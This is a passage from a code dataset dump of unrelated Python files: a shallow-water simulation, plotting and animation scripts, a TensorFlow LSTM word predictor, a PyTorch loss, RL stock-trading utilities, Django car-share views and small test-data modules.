break\n","repo_name":"jadir-figueiredo/Projeto_final","sub_path":"Projeto_biblioteca/funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11048730528","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gs\nimport pyfftw.interfaces.numpy_fft as fft\n\nnx = 256\nny = 256\n\nLx = 4e6\nLy = 4e6\n\nh0 = 100.\ng = 9.81\nnu = 0.\nf0 = 0.\n\nif (f0 > 0.):\n print('Rossby radius = {0} km'.format(1.e-3*(g*h0)**.5/f0))\n\nx = np.arange(0., Lx, Lx/nx)\ny = np.arange(0., Ly, Ly/ny)\n\nx_km = x/1000\ny_km = y/1000\n\nkx = 2.*np.pi/Lx * np.arange(0, nx//2+1)\nky = np.zeros(ny)\nky[0:ny//2+1] = 2.*np.pi/Ly * np.arange(0, ny//2+1)\nfor j in range(1, ny//2+1):\n ky[-j] = -ky[j]\n\nu = np.zeros((ny, nx))\nv = np.zeros((ny, nx))\nh = np.zeros((ny, nx)) + h0\n\n#nx_waves = 2.\n#ny_waves = 2.\n\n#h = np.sin(nx_waves*2.*np.pi*x[np.newaxis,:]/Lx) \\\n# * np.sin(ny_waves*2.*np.pi*y[:,np.newaxis]/Ly)\n\nradius = .5e6\nsigma = radius/6\nh = np.exp( - (x[np.newaxis,:]-Lx/2)**2 / (2.*sigma**2) - (y[:,np.newaxis]-Ly/2)**2 / (2.*sigma**2) )\nh += h0\n\n## RANDOM FIELD\ndef generate_random_field(a_std):\n # the mean size of the perturbation.\n k1 = nx//16\n \n # the variance in wave number of perturbation\n ks2 = 2.**2.\n \n arnd = 2.*np.pi*np.random.rand(ny, nx//2+1)\n afftrnd = np.cos(arnd) + 1j*np.sin(arnd)\n # calculate the radial wave numbers\n l = np.zeros(afftrnd.shape)\n for j in range(0, ny//2+1):\n for i in range(0, nx//2+1):\n l[j,i] = (i**2 + j**2)**.5\n for j in range(ny//2+1,ny):\n for i in range(0, ny//2+1):\n l[j,i] = (i**2 + (ny-j)**2)**.5\n \n # filter on radial wave number using a gaussian function\n #fftfilter = zeros(sfft.shape, dtype=np.complex)\n factor = np.exp(-(l-k1)**2 / (2.*ks2))\n \n # create a line for plotting with the spectral bands\n #factork = linspace(0., 25., 1000)\n #factory1 = fac1*exp(-(factork-k1)**2. / (2.*ks2))\n #factory2 = fac2*exp(-(factork-k2)**2. / (2.*ks2))\n \n # create the filtered field\n afft = factor*afftrnd\n \n # make sure the mean is exactly 0\n afft[0,0] = 0.\n \n a = fft.irfft2(afft)\n \n # normalize the variance to 1\n a *= a_std/np.std(a)\n return a\n\n#h = generate_random_field(1.) 
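# Illustrative aside, separate from the shallow-water record around it: the pad/unpad
# helpers defined just below implement the classic 3/2-rule for dealiasing quadratic
# products: spectra are zero-padded to a 3/2-size grid before multiplying in physical
# space, and the 9/4 = (3/2)^2 factor compensates the 2-D FFT normalization. A 1-D
# numpy check (factors 3/2 and 2/3) that pad -> multiply -> unpad is alias-free:
import numpy as np

n = 16
x = np.arange(n) * 2.0 * np.pi / n
f, g = np.cos(3.0 * x), np.cos(2.0 * x)

def pad(s):                      # 9 rfft modes -> 13, scaled by 3/2
    return 1.5 * np.concatenate([s, np.zeros(4, dtype=complex)])

def unpad(s):                    # back to 9 modes, scaled by 2/3
    return (2.0 / 3.0) * s[: n // 2 + 1]

prod_hat = unpad(np.fft.rfft(np.fft.irfft(pad(np.fft.rfft(f)), 3 * n // 2)
                             * np.fft.irfft(pad(np.fft.rfft(g)), 3 * n // 2)))
exact = np.fft.rfft(f * g)       # alias-free here since mode 5 < Nyquist
print(np.allclose(prod_hat, exact))   # True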
+ h0\nq = generate_random_field(1.)\n\nnt = 172800\ndt = 100.\nt = 0.\n\n# Set all variables in Fourier space.\nu = fft.rfft2(u)\nv = fft.rfft2(v)\nh = fft.rfft2(h)\nq = fft.rfft2(q)\n\ndef pad(a):\n a_pad = np.zeros((3*ny//2, 3*nx//4+1), dtype=np.complex)\n a_pad[:ny//2,:nx//2+1] = a[:ny//2,:]\n a_pad[ny:3*ny//2,:nx//2+1] = a[ny//2:,:]\n return (9/4)*a_pad\n\ndef unpad(a_pad):\n a = np.zeros((ny, nx//2+1), dtype=complex)\n a[:ny//2,:] = a_pad[:ny//2,:nx//2+1]\n a[ny//2:,:] = a_pad[ny:3*ny//2,:nx//2+1]\n return (4/9)*a\n\ndef calc_prod(a, b):\n a_pad = pad(a)\n b_pad = pad(b)\n\n ab_pad = fft.rfft2( fft.irfft2(a_pad) * fft.irfft2(b_pad) )\n return unpad(ab_pad)\n\n#def calc_prod(a, b):\n# return fft.rfft2( fft.irfft2(a) * fft.irfft2(b) )\n\ndef calc_rhs(u, v, h, q):\n u_tend = - 1j * kx[np.newaxis,:] * calc_prod(u, u) \\\n - 1j * ky[:,np.newaxis] * calc_prod(v, u) \\\n - g * 1j * kx[np.newaxis,:] * h \\\n + f0 * v \\\n #- nu * (kx[np.newaxis,:]**2 + ky[:,np.newaxis]**2) * u\n v_tend = - 1j * kx[np.newaxis,:] * calc_prod(u, v) \\\n - 1j * ky[:,np.newaxis] * calc_prod(v, v) \\\n - g * 1j * ky[:,np.newaxis] * h \\\n - f0 * u \\\n #- nu * (kx[np.newaxis,:]**2 + ky[:,np.newaxis]**2) * v\n h_tend = - 1j * kx[np.newaxis,:] * calc_prod(u, h) \\\n - 1j * ky[:,np.newaxis] * calc_prod(v, h) \\\n - calc_prod(h, 1j * kx[np.newaxis,:] * u + 1j * ky[:,np.newaxis] * v) \\\n #- nu * (kx[np.newaxis,:]**2 + ky[:,np.newaxis]**2) * h\n #+ fft.rfft2((200./86400)*fft.irfft2(q)) \\\n\n q_tend = - 1j * kx[np.newaxis,:] * calc_prod(u, q) \\\n - 1j * ky[:,np.newaxis] * calc_prod(v, q) \\\n #- nu * (kx[np.newaxis,:]**2 + ky[:,np.newaxis]**2) * q\n\n return u_tend, v_tend, h_tend, q_tend\n\noutput = True\nn_out = 1\nfor n in range(nt):\n if (output and n%n_out == 0):\n h_plot = fft.irfft2(h)-h0\n q_plot = fft.irfft2(q)\n\n print('{0}'.format(n//n_out))\n\n plot_grid = gs.GridSpec(3,1)\n plt.figure(figsize = (6,9))\n plt.subplot(plot_grid[0:2])\n plt.pcolormesh(x_km, y_km, h_plot, vmin=-0.3, vmax=0.6)\n xx, yy = np.meshgrid(x/1000., y/1000)\n nq=4\n plt.quiver(xx[::nq, ::nq], yy[::nq, ::nq], fft.irfft2(u)[::nq, ::nq], fft.irfft2(v)[::nq, ::nq], scale=2., pivot='mid')\n #plt.pcolormesh(x_km, y_km, q_plot, vmin=-2, vmax=2)\n #plt.pcolormesh(x_km, y_km, q_plot)\n #plt.colorbar()\n plt.title('{0} d'.format(n*dt/86400))\n plt.subplot(plot_grid[2])\n plt.plot(x_km, h_plot[ny//2,:], label='{0}'.format(n//n_out))\n plt.ylim(-0.3, 1.1)\n plt.grid()\n plt.tight_layout()\n plt.savefig('figs/{0:08d}.png'.format(n//n_out), dpi=100)\n plt.close()\n\n u_tend1, v_tend1, h_tend1, q_tend1 = calc_rhs(u, v, h, q)\n u_tend2, v_tend2, h_tend2, q_tend2 = calc_rhs(u + dt*u_tend1/2, v + dt*v_tend1/2, h + dt*h_tend1/2, q + dt*q_tend1/2)\n u_tend3, v_tend3, h_tend3, q_tend3 = calc_rhs(u + dt*u_tend2/2, v + dt*v_tend2/2, h + dt*h_tend2/2, q + dt*q_tend2/2)\n u_tend4, v_tend4, h_tend4, q_tend4 = calc_rhs(u + dt*u_tend3 , v + dt*v_tend3 , h + dt*h_tend3 , q + dt*q_tend3 )\n\n u += dt * (u_tend1 + 2.*u_tend2 + 2.*u_tend3 + u_tend4) / 6.\n v += dt * (v_tend1 + 2.*v_tend2 + 2.*v_tend3 + v_tend4) / 6.\n h += dt * (h_tend1 + 2.*h_tend2 + 2.*h_tend3 + h_tend4) / 6.\n q += dt * (q_tend1 + 2.*q_tend2 + 2.*q_tend3 + q_tend4) / 6.\n\n","repo_name":"Chiil/smallprograms","sub_path":"shallow_water_2d/shallow_water_2d.py","file_name":"shallow_water_2d.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15491416167","text":"#! 
/usr/bin/env python\n\nfrom glob import glob\nimport os\nimport time\n\nfrom matplotlib.animation import FuncAnimation\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms\nimport numpy as np\nimport pandas as pd\n\nimport mymodule as my\n\nstart_time = time.perf_counter()\nthis_file = os.path.basename(__file__)\nfile_name = this_file.split(\".\")[0]\n\n# Options\n\ntitles = [\"Production of $\\it{B}$\",\n \"Byproduct help\",\n \"Fitness\",\n \"Fitness deficit\"]\nvmaxs = [my.a2max,\n my.a2max,\n my.wmax,\n my.wmax]\n\ngivens = np.linspace(0., 1., num=42)\nmovie = True\nplotsize = 4\n\n# Add data to figure\n\ndef update(given, artists):\n a2 = my.a2eq(given, AA, RR)\n w = my.fitness(a2, a2, given, AA, RR)\n dif = wsocial - w\n artists[0].set_array(a2)\n artists[1].set_array(a2*given)\n artists[2].set_array(w)\n artists[3].set_array(dif)\n if movie:\n fig.texts[2].set_text(f\"Given {given*100:.0f}%\")\n return artists.flatten()\n\n# Data\n\nnr = 513\nnc = nr\nalphas = np.linspace(my.alphamax, my.alphamin, num=nr)\nlogess = np.linspace(my.logesmin, my.logesmax, num=nc)\nrhos = 1. - 1./pow(2., logess)\nRR, AA = np.meshgrid(rhos, alphas)\na2social = my.a2eq(0., AA, RR)\nwsocial = my.fitness(a2social, a2social, 0., AA, RR)\n\n# Figure properties\n\nwidth = plotsize*len(titles) - 2.\nheight = plotsize\nxlabel = \"Substitutability of $\\it{B}$\"\nylabel = \"Influence of $\\it{B}$\"\nbiglabel = plotsize*6\nletterlabel = plotsize*5\nticklabel = plotsize*4\nxticks = [0, nc/2 - 0.5, nc - 1]\nyticks = [0, nr/2 - 0.5, nr - 1]\nxmin = my.logesmin\nxmax = my.logesmax\nymin = my.alphamin\nymax = my.alphamax\nxticklabels = [f\"{xmin:.0f}\",\n f\"{(xmin + xmax)/2.:.0f}\",\n f\"{xmax:.0f}\"]\nyticklabels = [f\"{ymax:.1f}\",\n f\"{(ymin + ymax)/2.:.1f}\",\n f\"{ymin:.1f}\"]\nplt.rcParams[\"pdf.fonttype\"] = 42\nplt.rcParams[\"ps.fonttype\"] = 42\n\n# Create figure\n\nfig, axs = plt.subplots(nrows=1,\n ncols=len(titles),\n figsize=(width, height))\nplt.subplots_adjust(top=0.80, bottom=0.25, wspace=0.3)\n\nleft_x = axs[0].get_position().x0\nright_x = axs[-1].get_position().x1\ncenter_x = (left_x + right_x) / 2.\ntop_y = axs[0].get_position().y1\nbottom_y = axs[0].get_position().y0\ncenter_y = (top_y + bottom_y) / 2.\nfig.supxlabel(xlabel,\n x=center_x,\n y=bottom_y*0.2,\n fontsize=biglabel)\nfig.supylabel(ylabel,\n x=left_x*0.4,\n y=center_y,\n fontsize=biglabel)\n\nox = 0/72.\noy = 0/72.\noffset = matplotlib.transforms.ScaledTranslation(ox, oy, fig.dpi_scale_trans)\n\nletterposition = 1.035\nfor i, ax in enumerate(fig.get_axes()):\n ax.set(xticks=xticks, yticks=yticks)\n ax.set(xticklabels=[], yticklabels=[])\n for axis in [\"top\", \"bottom\", \"left\", \"right\"]:\n ax.spines[axis].set_linewidth(0.1)\n letter = ord(\"a\") + i\n ax.text(0,\n letterposition,\n chr(letter),\n transform=ax.transAxes,\n fontsize=letterlabel,\n weight=\"bold\")\naxs[0].set_yticklabels(yticklabels, fontsize=ticklabel)\nfor c, title in enumerate(titles):\n axs[c].set_title(title, pad=plotsize*7, fontsize=letterlabel)\n axs[c].set_xticklabels(xticklabels,\n fontsize=ticklabel)\n for label in axs[c].xaxis.get_majorticklabels():\n label.set_transform(label.get_transform() + offset)\n\nif movie:\n fig.text(right_x,\n bottom_y*0.2,\n f\"Given\",\n fontsize=biglabel,\n color=\"grey\",\n ha=\"right\")\n\n# Assign axs objects to variables\n# (AxesImage)\n\nartists = np.empty_like(axs) \ndummy_Z = np.zeros((nr, nc))\nframes = givens\n\nfor c, title in enumerate(titles):\n artists[c] = axs[c].imshow(dummy_Z,\n vmin=0,\n 
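# Illustrative aside, separate from the nonetheorymov.py record around it: the movie
# logic just below follows the standard FuncAnimation pattern — create the artists
# once, then have update() only call set_array()/set_text() and return the changed
# artists so blitting redraws just those. A minimal self-contained version (saving
# to mp4 assumes ffmpeg is installed):
import numpy as np
import matplotlib
matplotlib.use("Agg")                      # headless backend, save-only
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation

fig, ax = plt.subplots()
im = ax.imshow(np.zeros((8, 8)), vmin=0.0, vmax=1.0)

def update(frame):
    im.set_array(np.random.default_rng(frame).random((8, 8)))  # new data, same artist
    return (im,)

ani = FuncAnimation(fig, update, frames=10, blit=True)
ani.save("demo.mp4", writer="ffmpeg", fps=5)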
vmax=vmaxs[c])\n\n# Add data and save figure\n\nif movie:\n    ani = FuncAnimation(fig,\n                        update,\n                        frames=frames,\n                        fargs=(artists,),\n                        blit=True)\n    ani.save(file_name + \".mp4\", writer=\"ffmpeg\", fps=10)\nelse:\n    update(frames[-1], artists,)\n    plt.savefig(file_name + \".png\", transparent=False)\n\nplt.close()\n\nend_time = time.perf_counter()\nprint(f\"\\nTime elapsed: {(end_time - start_time):.2f} seconds\")\n","repo_name":"marcefuentes/gnr","sub_path":"bin/nonetheorymov.py","file_name":"nonetheorymov.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"28384257985","text":"headers = {\r\n    \"Content-Type\": \"application/json\"\r\n}\r\n\r\norder_body = {\r\n    \"firstName\": \"Иосиф\",\r\n    \"lastName\": \"Сталин\",\r\n    \"address\": \"Москва, ул. Ленина, 1\",\r\n    \"metroStation\": 4,\r\n    \"phone\": \"+7123456789\",\r\n    \"rentTime\": 1,\r\n    \"deliveryDate\": \"2023-06-06\",\r\n    \"comment\": \"no pasaran\",\r\n    \"color\": [\r\n        \"BLACK\"\r\n    ]\r\n}\r\n\r\n","repo_name":"EvgeniaGlazovskaya/Glazovskaya_Evgenia_diplom","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"27450954579","text":"from typing import Set\r\n\r\nINT = \"int\"\r\nFLOAT = \"float\"\r\nSTRING = \"str\"\r\nBOOLEAN = \"bool\"\r\nLIST = \"list\"\r\nNONE = \"None\"\r\n\r\ntypes: Set[str] = {INT, STRING, FLOAT, BOOLEAN, LIST, NONE}\r\n\r\n\r\ndef getWrongTypes(ans: str) -> Set[str]:\r\n    return types - set((ans,))\r\n","repo_name":"CSTools-UCD/moodle-trace-generator","sub_path":"parser/python/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"4163901578","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport tensorflow as tf\nimport sys\nimport random\nimport collections\n\n\n### 1. Read the data\n\ncontent = \"\"\nwith open('./belling_the_cat.txt') as f:\n    content = f.read()\n\nwords = content.split()\nprint (words)\n\ndef build_dataset(words):\n    count = collections.Counter(words).most_common()\n#    print (\"count\", count)\n\n    ## build the forward dictionary (word -> id)\n    dictionary = dict()\n    for word, _ in count:\n        dictionary[word] = len(dictionary)\n\n    ## build the reverse dictionary (id -> word)\n    reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n\n    ## return both the forward and reverse dictionaries\n    return dictionary,reverse_dictionary\n\ndictionary, reverse_dictionary = build_dataset(words)\n#print (dictionary)\n#print (reverse_dictionary)\n\n### 2. Build the model parameters\nvocab_size = len(dictionary)\nn_input = 3\nn_hidden = 512\nbatch_size = 20\n\n#with tf.variable_scope('scope1', reuse=True):\nweight = tf.get_variable('weight_out', [2*n_hidden, vocab_size], \\\n                         initializer= tf.random_normal_initializer)\nbias = tf.get_variable('bias_out', [vocab_size], \\\n                       initializer= tf.random_normal_initializer)\n\n\n### Define the RNN\ndef RNN(x, weight, bias):\n    x = tf.reshape(x, [-1, n_input])\n    x = tf.split(x, n_input, 1)\n    ## use the tensorflow API to define the lstm_cell\n    ## build the forward cell\n    rnn_cell_format = tf.nn.rnn_cell.BasicLSTMCell\\\n        (n_hidden, state_is_tuple=True, forget_bias=1.0)\n    ## build the backward cell\n    rnn_cell_backmat = tf.nn.rnn_cell.BasicLSTMCell\\\n        (n_hidden, state_is_tuple=True, forget_bias=1.0)\n    outputs, outputs_states_fw, output_states_hw = tf.nn.static_bidirectional_rnn\\\n        (rnn_cell_format, rnn_cell_backmat, x, dtype=tf.float32)\n    return tf.matmul(outputs[-1], weight) + bias\n\n### Data conversion\ndef build_data(offset):\n    while offset + n_input > vocab_size:\n        offset = random.randint(0, vocab_size-n_input)\n    ## randomly pick 3 consecutive words from the sample range and map them to ids\n    symbols_in_key = [[dictionary[str(words[i])]] for i in range(offset, offset+n_input)]\n    symbols_out_onehot = np.zeros([vocab_size], dtype=float)\n    symbols_out_onehot[dictionary[str(words[offset+n_input])]] = 1.0\n    return symbols_in_key, symbols_out_onehot\n\n### Build the loss function\nx = tf.placeholder(tf.float32, [None, n_input, 1])\ny = tf.placeholder(tf.float32, [None, vocab_size])\npred = RNN(x, weight, bias)\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\n#with tf.variable_scope('scope2', reuse=True):\noptimizer = tf.train.AdamOptimizer(learning_rate=1e-5).minimize(cost)\n\n### Build the accuracy computation\ncorrect_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y,1))\n### turn the accuracy into a percentage\naccuary = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n### Train the model\n\nwith tf.Session() as sess:\n    sess.run(tf.global_variables_initializer())\n    for i in range(50000):\n        x_train, y_train = [], []\n        for b in range(batch_size):\n            new_x, new_y = build_data(random.randint(0, vocab_size))\n            x_train.append(new_x)\n            y_train.append(new_y)\n        _opt = sess.run(optimizer, feed_dict={x:np.array(x_train), y:np.array(y_train)})\n#        print (\"train ... \")\n        \n        if i%100 == 0:\n            acc, out_pred = sess.run([accuary, pred], feed_dict={x:np.array(x_train), y:np.array(y_train)})\n            symbols_in = [reverse_dictionary[word_index[0]] for word_index in x_train[0]]\n            symbols_out = reverse_dictionary[int(np.argmax(y_train, 1)[0])]\n            pred_out = reverse_dictionary[int(np.argmax(out_pred,1)[1])]\n            print ('epoch:%d, Acc:%f'%(i,acc))\n            print ('%s-[%s]vs[%s]'%(symbols_in, symbols_out, pred_out))\n            print (out_pred.shape)\n\n    while True:\n        start_sentence = input(\"Please input %s words:\"%n_input)\n        words = start_sentence.strip().split()\n        if len(words) != n_input:\n            continue\n        elif words[0] == words[1] and words[1] == words[2] and words[2] == 'exit':\n            break\n        else: \n            pass\n        \n        print (\"predicting ... 
\")\n \n try:\n symbols_in_keys = [dictionary[str(words[i])] for i in range(len(words))]\n for _ in range(1):\n keys = np.reshape(np.array(symbols_in_keys), [-1, n_input, 1])\n onehot_pred = sess.run(pred, feed_dict={x:keys})\n onehot_pred_index = int(tf.argmax(onehot_pred,1).eval())\n start_sentence = '%s%s'%(start_sentence, reverse_dictionary[onehot_pred_index])\n symbols_in_keys = symbols_in_keys[1:]\n symbols_in_keys.append(onehot_pred_index)\n print (start_sentence)\n except:\n print(\"Word not in dictionary\")\n\n\n\n","repo_name":"zxorange321/learn","sub_path":"dl/lstm/class_lstm.py","file_name":"class_lstm.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"36334709168","text":"from typing import List\n\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n hs2 = {}\n for i in nums2:\n hs2[i] = hs2.get(i,0) + 1\n \n ar = []\n for i in nums1:\n if i in hs2 and hs2[i] != 0:\n ar.append(i)\n hs2[i] -= 1\n return ar\n \n","repo_name":"G4vp/LeetCode","sub_path":"Python/Easy/350-Intersection_of_Two_Arrays_II.py","file_name":"350-Intersection_of_Two_Arrays_II.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18406456351","text":"from torch import Tensor, nn\nfrom tts.collate_fn import Batch\nfrom torch.nn import functional as F\n\n\nclass WaveFormReconstructionLoss(nn.Module):\n def __init__(self, featurizer, pad_value):\n super().__init__()\n self.waveform_loss = nn.L1Loss()\n self.featurizer = featurizer\n self.pad_value = pad_value\n\n def forward(self, batch: Batch) -> Tensor:\n melspec_prediction = self.featurizer(batch.waveform_prediction)\n melspec = batch.melspec\n\n diff_len = melspec_prediction.shape[-1] - melspec.shape[-1]\n\n if diff_len < 0:\n melspec_prediction = F.pad(melspec_prediction, (0, -diff_len), value=self.pad_value)\n else:\n melspec = F.pad(melspec, (0, diff_len), value=self.pad_value)\n \n waveform_l1 = self.waveform_loss(\n melspec,\n melspec_prediction\n )\n\n return waveform_l1\n","repo_name":"timothyxp/Hi-Fi-Gan","sub_path":"tts/loss/reconstruction.py","file_name":"reconstruction.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"75103146496","text":"import os\nimport pdb\nimport torch\nimport random\nimport numpy as np\nimport pandas as pd\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport pdb\n\nfrom tqdm import trange\nfrom typing import List, Dict\nfrom torch.optim import AdamW, Adam\nfrom IPython.display import display\nfrom abc import ABC, abstractmethod\nfrom pandas_datareader import data as datareader\nfrom matplotlib.collections import LineCollection\nfrom matplotlib.colors import ListedColormap, BoundaryNorm\n\nfrom stockstats import wrap\nimport pyfolio\n\nPATH_TO_DATA = 'data/AAPL_stocks_splits.csv'\n\ndef seed_everything(seed = 42):\n random.seed(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n generator = torch.Generator()\n generator.manual_seed(seed)\n\nSEED = 42 \nDEVICE = torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu')\nRD = lambda x: np.round(x, 3)\nsigmoid = lambda x: 1 / (1 + np.exp(-x))\n\nSTAGE = 1 # if we change the structure 
of the GlobalLogger.csv we increase the stage number\nUSER = \"adrian\"\n\nseed_everything(seed = SEED)\n\ndef calculate_scalers(normalizers, features, train_data):\n from sklearn.preprocessing import MinMaxScaler\n\n scalers = {}\n\n for idx, elem in enumerate(normalizers):\n if elem == 'minmax':\n scaler = MinMaxScaler()\n scaler.fit(np.array(train_data[0])[:, idx].reshape(-1, 1))\n\n scalers[features[idx]] = scaler\n # print(np.array(train_data[0])[:, idx])\n\n return scalers\n\ndef normalize_features(current_day: list, next_day: list, config_file, scalers):\n # assert normalizers in \\\n # [\"sigmoid\", \"percent\", \"minmax\"], \"[normalizer] -> Option Not Implemented\"\n\n features = list(config_file[\"features_used\"].keys())\n normalizers = list(config_file[\"features_used\"].values())\n\n normalized_features = []\n for i in range(len(current_day)):\n if normalizers[i] == \"sigmoid\":\n normalized_feature = sigmoid(next_day[i] - current_day[i])\n elif normalizers[i] == \"percent\":\n try:\n normalized_feature = next_day[i] - current_day[i] / current_day[i]\n except ZeroDivisionError:\n normalized_feature = next_day[i] - current_day[i]\n elif normalizers[i] == \"minmax\":\n scaler = scalers[features[i]]\n normalized_feature = scaler.transform([[next_day[i] - current_day[i]]]).squeeze(0).squeeze(0)\n\n normalized_features.append(normalized_feature)\n\n return normalized_features\n\nclass EpsilonScheduler():\n def __init__(self, epsilon = 1.0, epsilon_final = 0.01, epsilon_decay = 0.995):\n self.epsilon = epsilon\n self.epsilon_final = epsilon_final\n self.epsilon_decay = epsilon_decay\n\n def get(self):\n return self.epsilon\n\n def step(self):\n if self.epsilon > self.epsilon_final:\n self.epsilon *= self.epsilon_decay\n\nclass GlobalLogger:\n def __init__(self, path_to_global_logger: str, save_to_log: bool):\n self.save_to_log = save_to_log\n self.path_to_global_logger = path_to_global_logger\n\n if os.path.exists(self.path_to_global_logger):\n self.logger = pd.read_csv(self.path_to_global_logger)\n else:\n # create folder if not exist\n os.makedirs(os.path.dirname(self.path_to_global_logger), exist_ok=True)\n\n def append(self, config_file: Dict, output_file: Dict):\n if self.save_to_log == False: return\n\n if os.path.exists(self.path_to_global_logger) == False:\n config_columns = [key for key in config_file.keys()]\n output_columns = [key for key in output_file.keys()]\n\n columns = config_columns + output_columns \n logger = pd.DataFrame(columns = columns)\n logger.to_csv(self.path_to_global_logger, index = False)\n \n self.logger = pd.read_csv(self.path_to_global_logger)\n sample = {**config_file, **output_file}\n columns = [key for (key, value) in sample.items()]\n\n row = [value for (key, value) in sample.items()]\n row = np.array(row)\n row = np.expand_dims(row, axis = 0)\n\n sample = pd.DataFrame(row, columns = columns)\n self.logger = self.logger.append(sample, ignore_index = True)\n self.logger.to_csv(self.path_to_global_logger, index = False)\n\n def get_version_id(self):\n if os.path.exists(self.path_to_global_logger) == False: return 0\n logger = pd.read_csv(self.path_to_global_logger)\n ids = logger[\"id\"].values\n if len(ids) == 0: return 0\n return ids[-1] + 1\n \n def view(self):\n from IPython.display import display\n display(self.logger)\n\n\nclass Logger:\n def __init__(self, path_to_logger: str = 'logger.log', distributed = False):\n from logging import getLogger, INFO, FileHandler, Formatter, StreamHandler\n\n self.logger = getLogger(__name__)\n 
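# Illustrative aside: a usage sketch for the EpsilonScheduler defined above, assuming
# the class and the "import numpy as np" from this same file. It drives plain
# exponential epsilon decay for an epsilon-greedy policy, with epsilon_final as floor.
sched = EpsilonScheduler(epsilon=1.0, epsilon_final=0.01, epsilon_decay=0.995)
for step in range(1000):
    # explore with probability sched.get(), otherwise exploit (policy elided here)
    explore = np.random.rand() < sched.get()
    sched.step()
print(round(sched.get(), 4))   # ~0.01: decay has reached the floor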
self.logger.setLevel(INFO)\n\n if distributed == False:\n handler1 = StreamHandler()\n handler1.setFormatter(Formatter(\"%(message)s\"))\n self.logger.addHandler(handler1)\n\n handler2 = FileHandler(filename = path_to_logger)\n handler2.setFormatter(Formatter(\"%(message)s\"))\n self.logger.addHandler(handler2)\n\n def print(self, message):\n self.logger.info(message)\n\n def close(self):\n handlers = self.logger.handlers[:]\n for handler in handlers:\n handler.close()\n self.logger.removeHandler(handler)\n","repo_name":"andeceneu4more/rl-stoks-pick","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27960663855","text":"from django.shortcuts import render\nfrom django.db import models\n\nimport datetime\nfrom dateutil import parser\n\nfrom carshare.models import *\n \ndef index(request):\n return render(request, 'index.html')\n\n\ndef reservations(request):\n\n if request.method == 'POST':\n insert_reservation(request.POST)\n\n filter_date = datetime.date.today()\n res_tuples = []\n\n if 'date' in request.GET and request.GET['date']:\n filter_date = request.GET['date']\n filter_date = parser.parse(filter_date)\n res_tuples = reservations_for_day(filter_date)\n reservations = [Reservation(t) for t in res_tuples]\n else:\n reservations = all_reservations()\n \n for res in reservations:\n res.car = car_by_id(res.carNum)\n res.member = member_by_id(res.memNum)\n res.location = location_by_id(res.locNum)\n\n cars = all_cars()\n\n for car in cars:\n car.location = location_by_id(car.locNum)\n\n members = all_members()\n\n return render(request, 'reservations_today.html', {'reservations': reservations,\n 'cars': cars,\n 'members': members})\n\ndef usage_history(request, carNum):\n\n car = car_by_id(carNum)\n \n today = datetime.date.today()\n\n res_tuples = reservations_for_day(filter_date)\n\n reservations = [Reservation(t) for t in res_tuples]\n\n for res in reservations:\n res.car = car_by_id(res.carNum)\n res.member = member_by_id(res.memNum)\n res.location = location_by_id(res.locNum)\n\n return render(request, 'reservations_today.html', {'reservations': reservations})\n\ndef cars(request):\n\n if request.method == 'POST':\n insert_car(request.POST)\n\n if 'locNum' in request.GET and request.GET['locNum']:\n cars = cars_for_location(request.GET['locNum'])\n elif 'freeCars' in request.GET and request.GET['freeCars']:\n cars = cars_not_in_use()\n else:\n cars = all_cars()\n\n for car in cars:\n car.location = location_by_id(car.locNum)\n car.reservations = reservations_for_car(car.id)\n\n history = past_reservations(car.id)\n\n for res in history:\n res.location = location_by_id(res.locNum)\n res.member = member_by_id(res.memNum)\n\n car.usageHistory = history\n\n print(history)\n\n locations = all_locations()\n\n return render(request, 'cars.html', {'cars': cars,\n 'locations': locations,})\n\ndef members(request):\n\n if request.method == 'POST':\n insert_member(request.POST)\n\n members = all_members()\n\n return render(request, 'members.html', {'members': members})\n\n\ndef account(request, memNum):\n\n if request.method == 'POST':\n if 'annualFee' in request.POST:\n charge_annual_fee(memNum)\n elif 'payBalance' in request.POST:\n pay_balance(memNum)\n\n member = member_by_id(memNum)\n\n transactions = transcations_for_member(memNum)\n\n can_charge = can_charge_annual_fee(memNum)\n\n balance = balance_for_member(memNum)\n\n return 
